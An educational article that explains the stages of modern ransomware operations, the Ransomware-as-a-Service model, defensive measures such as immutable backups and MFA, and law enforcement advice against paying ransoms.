Ransomware Is Not What It Used to Be

Early ransomware was relatively blunt: a piece of malware would encrypt your files and demand a small payment. Today's ransomware operations are professional criminal enterprises with customer service portals, negotiation teams, and affiliate networks. Understanding how they work is the first step in defending against them.

Stage 1: Initial Access

Attackers need a foothold before anything else. The most common entry points are:

  • Phishing emails: Malicious attachments or links that deliver a dropper or exploit.
  • Exposed RDP (Remote Desktop Protocol): Brute-forced or credential-stuffed accounts on internet-facing remote desktops.
  • Unpatched software vulnerabilities: Known CVEs in VPNs, firewalls, or web-facing applications exploited before patches are applied.
  • Compromised credentials: Bought from dark web marketplaces sourced from earlier data breaches.

Stage 2: Reconnaissance and Lateral Movement

Once inside, attackers don't rush. They often spend days or weeks quietly:

  • Mapping the network to identify high-value targets (domain controllers, backup servers, finance systems).
  • Escalating privileges using tools like Mimikatz to steal credentials from memory.
  • Moving laterally to additional machines using legitimate admin tools like PsExec or WMI — this is called "living off the land" and makes detection harder.
  • Identifying and disabling or destroying backups to maximize leverage.

Stage 3: Data Exfiltration (Double Extortion)

Modern ransomware groups don't just encrypt your files — they steal them first. This "double extortion" tactic means victims face two threats:

  1. Encrypted systems they can't access without a decryption key.
  2. Stolen data being publicly leaked or sold if the ransom isn't paid.

Some groups have evolved to triple extortion, also threatening to notify the victim's clients or regulators about the breach.

Stage 4: Encryption and Ransom Demand

The ransomware payload itself is often the last thing deployed — and the most visible. It uses strong asymmetric encryption (typically RSA + AES) so that decryption without the attacker's private key is computationally infeasible. A ransom note is dropped, directing victims to a Tor-based negotiation portal.

Ransomware-as-a-Service (RaaS)

Many major ransomware attacks today are carried out by affiliates who license the ransomware from developers and share a percentage of proceeds. This model has dramatically lowered the skill barrier for attackers and increased the volume of incidents globally.

How to Defend Against Ransomware

  • Immutable, offsite backups: The most effective recovery tool — ensure they can't be reached from your main network.
  • Patch management: Prioritize internet-facing systems. Most ransomware exploits known, patched vulnerabilities.
  • MFA everywhere: Especially on RDP, VPNs, and email — prevents credential-based access.
  • Network segmentation: Limit how far an attacker can move laterally if they do get in.
  • Endpoint Detection and Response (EDR): Modern EDR solutions can detect ransomware behavior before encryption completes.
  • User awareness training: Phishing remains the #1 entry point — train employees to recognize it.

Should You Pay the Ransom?

Law enforcement generally advises against paying — it funds criminal operations, doesn't guarantee data recovery, and marks you as a willing payer for future attacks. Consult legal counsel and your country's relevant authorities (FBI, CISA, NCSC) before making any decision.